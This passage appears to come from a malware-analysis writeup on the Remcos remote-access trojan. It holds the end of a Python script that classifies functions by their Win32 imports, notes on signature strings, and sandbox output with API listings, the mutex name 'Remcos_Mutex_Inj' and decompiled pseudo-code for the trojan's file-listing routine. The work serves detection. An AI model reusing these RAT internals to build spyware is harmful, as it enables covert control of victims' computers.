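• FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
• FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
• wcscmp.MSVCRT ref: 00404924
• FindClose.KERNEL32(000000FF,?,?,?), ref: 00404B39
• ExitThread.KERNEL32 ref: 00404BFE
"""

if __name__ == "__main__":
    for label, text in (("0040A5FE", WATCHDOG), ("00409A49", PROC_ENUM), ("00404783", DIR_LISTING)):
        hits = [n for n, ok in classify(parse_listing(text)).items() if ok]
        print(f"function {label}: {', '.join(hits) or 'no rule matched'}")
```

The rules deliberately key on the Win32 imports and on argument literals rather than on the mangled MSVCP60 names, which dominate the listings but only describe std::string bookkeeping; `string_args` also surfaces the log strings ("[INFO]", "Remcos restarted by watchdog!") that are the most stable material for a string-based signature. Subcall lines are kept in the same API set as the function's own calls, so `send` inside function 00402440 still counts toward the directory-listing rule.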

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409A81
                                  • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00409ACC
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                  • CloseHandle.KERNEL32(?), ref: 00409BC1
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                  • wcslen.MSVCRT ref: 00409C25
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                  • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                  • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                  • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                  • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                  • API String ID: 2459104678-694575909
                                  • Opcode ID: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                  • Opcode Fuzzy Hash: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 19%
                                  			E00410586(intOrPtr* __eax, void* __eflags, void* _a8) {
                                  				char _v5;
                                  				char _v6;
                                  				char _v7;
                                  				char _v8;
                                  				char _v9;
                                  				char _v10;
                                  				void* _v16;
                                  				char _v32;
                                  				char _v48;
                                  				char _v64;
                                  				char _v80;
                                  				char _v96;
                                  				char _v112;
                                  				char _v128;
                                  				char _v144;
                                  				void* _v160;
                                  				char _v176;
                                  				void* _v192;
                                  				char _v208;
                                  				void* _v224;
                                  				char _v240;
                                  				void* _v256;
                                  				char _v272;
                                  				struct _WIN32_FIND_DATAW _v864;
                                  				char _v1296;
                                  				void* _t82;
                                  				void* _t85;
                                  				char* _t87;
                                  				int _t88;
                                  				int _t90;
                                  				char* _t92;
                                  				int _t93;
                                  				struct _WIN32_FIND_DATAW* _t96;
                                  				struct _WIN32_FIND_DATAW* _t98;
                                  				char* _t102;
                                  				void* _t106;
                                  				char* _t107;
                                  				char* _t112;
                                  				char* _t113;
                                  				char* _t114;
                                  				char* _t115;
                                  				char* _t116;
                                  				void* _t118;
                                  				intOrPtr _t180;
                                  				void* _t181;
                                  				intOrPtr* _t187;
                                  				void* _t188;
                                  				void* _t191;
                                  				void* _t195;
                                  
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t180 =  *__eax;
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(__eflags,  &_v48,  &_v80, 0x41b310,  &_v80, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				_t191 = _t188 + 0x24;
                                  				_t181 = _t180 - 0x19;
                                  				if(_t181 == 0) {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v10);
                                  					L00414146();
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v64, 0x41bfb8, L"\\*");
                                  					_t82 = FindFirstFileW( &_v864,  &_v864);
                                  					__eflags = _t82 - 0xffffffff;
                                  					_v16 = _t82;
                                  					if(_t82 == 0xffffffff) {
                                  						L15:
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  						E004020C2(0x41bf70, 0x5d,  &_v32);
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						L16:
                                  						_t85 = E004017DD( &_v48);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						return _t85;
                                  					}
                                  					_t87 =  &(_v864.cFileName);
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t87,  &_v9, ".");
                                  					_t187 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
                                  					_t88 =  *_t187(_t87);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__eflags = _t88;
                                  					if(_t88 != 0) {
                                  						_t98 =  &_v864;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t98, 0x250,  &_v7);
                                  						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t98);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					}
                                  					_t90 = FindNextFileW(_v16,  &_v864);
                                  					while(1) {
                                  						__eflags = _t90;
                                  						if(_t90 == 0) {
                                  							goto L15;
                                  						}
                                  						_t92 =  &(_v864.cFileName);
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t92,  &_v8, L"..");
                                  						_t93 =  *_t187(_t92);
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  						__eflags = _t93;
                                  						if(_t93 != 0) {
                                  							_t96 =  &_v864;
                                  							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t96, 0x250,  &_v5);
                                  							__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t96);
                                  							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						}
                                  						_t90 = FindNextFileW(_v16,  &_v864);
                                  					}
                                  					goto L15;
                                  				}
                                  				_t205 = _t181 == 1;
                                  				if(_t181 == 1) {
                                  					_t102 =  &_v96;
                                  					L00414146();
                                  					L0041414C();
                                  					_t195 = _t191 + 0x18;
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v64, _t102, _t102, 0x41bfb8, "\\", E00412795( &_v208, E0040180C( &_v48, _t205, 1)));
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v6);
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t106 = E00412DDF( &_v32,  &_v32);
                                  					_t206 = _t106;
                                  					if(_t106 != 0) {
                                  						_t107 = E0040180C(0x41bcb0, _t206, 0x1b);
                                  						__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  						_t207 =  *_t107 - 1;
                                  						if( *_t107 == 1) {
                                  							__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  							_t118 = E00402F9B( &_v1296, _t107, _t107);
                                  							__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040309E( &_v1296,  &_v144, _t118, _t118));
                                  							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						}
                                  						_t112 =  &_v128;
                                  						L00414140();
                                  						_t113 =  &_v112;
                                  						L00414140();
                                  						_t114 =  &_v240;
                                  						L00414140();
                                  						_t115 =  &_v176;
                                  						L00414140();
                                  						_t116 =  &_v272;
                                  						L00414140();
                                  						L00414140();
                                  						E004020C2(0x41bf70, 0x5e, _t195 - 0x10);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t116, _t116, _t115, _t115, _t114, _t114, _t113, _t113, _t112, _t112, E0040180C( &_v48, _t207, 1), 0x41b310, E0040180C( &_v48, _t207, 0), 0x41b310, E0040180C( &_v48, _t207, 2), 0x41b310,  &_v32);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					}
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				goto L16;
                                  			}

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 004105AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004105BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000000,0041B310,00000000,00000002,0041B310,?), ref: 00410713
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00410730
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 00410740
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00410750
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0041075A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                  • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                  • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
